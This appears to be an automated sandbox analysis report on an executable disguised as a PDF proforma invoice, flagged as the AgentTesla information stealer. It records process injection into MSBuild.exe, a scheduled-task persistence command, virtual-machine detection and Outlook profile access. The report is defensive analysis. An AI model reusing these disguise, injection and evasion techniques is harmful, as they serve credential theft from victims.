Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /TN name /XML 'C:\Users\user\AppData\Local\Temp\eb880290d3c747809c5fd1c3af592ae7.xml'	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: Proforma Invoice with Bank Details_pdf.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: Proforma Invoice with Bank Details_pdf.exe, 00000000.00000003.205988083.0000000002E00000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Proforma Invoice with Bank Details_pdf.exe, 00000000.00000003.205988083.0000000002E00000.00000004.00000001.sdmp
Source:	Binary string: mscorrc.pdb source: MSBuild.exe, 00000003.00000002.476016918.0000000005E30000.00000002.00000001.sdmp

Source: Proforma Invoice with Bank Details_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Proforma Invoice with Bank Details_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Proforma Invoice with Bank Details_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Proforma Invoice with Bank Details_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Proforma Invoice with Bank Details_pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 3.2.MSBuild.exe.400000.0.unpack, gtu.cs

.Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

Code function: 0_2_00C5216C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00C5216C

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C66924 push ebx; iretd	0_2_00C66925
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C662AC pushad ; iretd	0_2_00C662AD
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C66B0A push ecx; ret	0_2_00C66B0B
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C6A41A push edx; retf	0_2_00C6A41E
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C60554 push eax; ret	0_2_00C605B9
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C45665 push ecx; ret	0_2_00C45678
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C60608 push eax; ret	0_2_00C605B9
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C4AF95 push ecx; ret	0_2_00C4AFA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05893FB7 push cs; retf	3_2_05893FCF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05893F43 push cs; retf	3_2_05893F5B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05893ECF push cs; retf	3_2_05893EE7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F341F6 push ebx; iretd	3_2_05F341FF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F315E9 push 0000005Dh; ret	3_2_05F315EB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F3012A push 69FFFFFFh; ret	3_2_05F30139
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F41722 push 08F2E872h; retf	3_2_05F41728
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 3_2_05F41712 push 0902E872h; retf	3_2_05F41718

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\folder\file.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /TN name /XML 'C:\Users\user\AppData\Local\Temp\eb880290d3c747809c5fd1c3af592ae7.xml'

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\folder\file.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep count: 338 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -10140000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -149530s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -89673s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -149300s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -179154s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -59780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -39626s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -39374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -39250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -489450s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -334016s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -39126s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -487875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -366940s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -644028s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -199215s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -271362s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -117192s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -371089s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -58737s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -39124s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -39000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -77812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -31689s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -96955s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -53045s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -58170s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -58218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -52810s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 7084	Thread sleep time: -31830s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Last function: Thread delayed

Source: MSBuild.exe, 00000003.00000002.475746937.00000000054B0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: MSBuild.exe, 00000003.00000003.315248335.0000000000CCF000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: MSBuild.exe, 00000003.00000002.475746937.00000000054B0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: MSBuild.exe, 00000003.00000003.315248335.0000000000CCF000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: MSBuild.exe, 00000003.00000002.475746937.00000000054B0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: MSBuild.exe, 00000003.00000002.475746937.00000000054B0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Code function: 3_2_04FA9498 LdrInitializeThunk,

3_2_04FA9498

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

0_2_00C5216C

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

0_2_00C5216C

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

0_2_00C5216C

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C41970 mov eax, dword ptr fs:[00000030h]	0_2_00C41970
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C41970 mov eax, dword ptr fs:[00000030h]	0_2_00C41970
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C654C7 mov eax, dword ptr fs:[00000030h]	0_2_00C654C7
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C61CC2 mov eax, dword ptr fs:[00000030h]	0_2_00C61CC2
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C65567 mov eax, dword ptr fs:[00000030h]	0_2_00C65567
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C65504 mov eax, dword ptr fs:[00000030h]	0_2_00C65504

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

Code function: 0_2_00C4A5C8 GetProcessHeap,

0_2_00C4A5C8

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C4F48B SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00C4F48B
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: 0_2_00C4F468 SetUnhandledExceptionFilter,		0_2_00C4F468

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 748008

Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /TN name /XML 'C:\Users\user\AppData\Local\Temp\eb880290d3c747809c5fd1c3af592ae7.xml'			Jump to behavior

Source: MSBuild.exe, 00000003.00000002.471050219.0000000001310000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: MSBuild.exe, 00000003.00000002.471050219.0000000001310000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: MSBuild.exe, 00000003.00000002.471050219.0000000001310000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: MSBuild.exe, 00000003.00000002.471050219.0000000001310000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

Code function: 0_2_00C49D71 cpuid

0_2_00C49D71

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_00C44897
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00C50BA1
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	0_2_00C4B35D
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00C524CA
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_00C515AE
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: EnumSystemLocalesEx,	0_2_00C4F54A
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: GetLocaleInfoEx,	0_2_00C4F560
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00C50FAA
Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe	Code function: GetLocaleInfoEx,__wcsnicmp,_TestDefaultCountry,_TestDefaultCountry,__invoke_watson,__invoke_watson,	0_2_00C5276E

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

Code function: 0_2_00C4BDF2 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,

0_2_00C4BDF2

Source: C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe

Code function: 0_2_00C62DC3 GetUserNameA,CreateFileW,WriteFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessW,

0_2_00C62DC3

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000003.00000002.473024653.0000000002C01000.00000004.00000001.sdmp, type: MEMORY
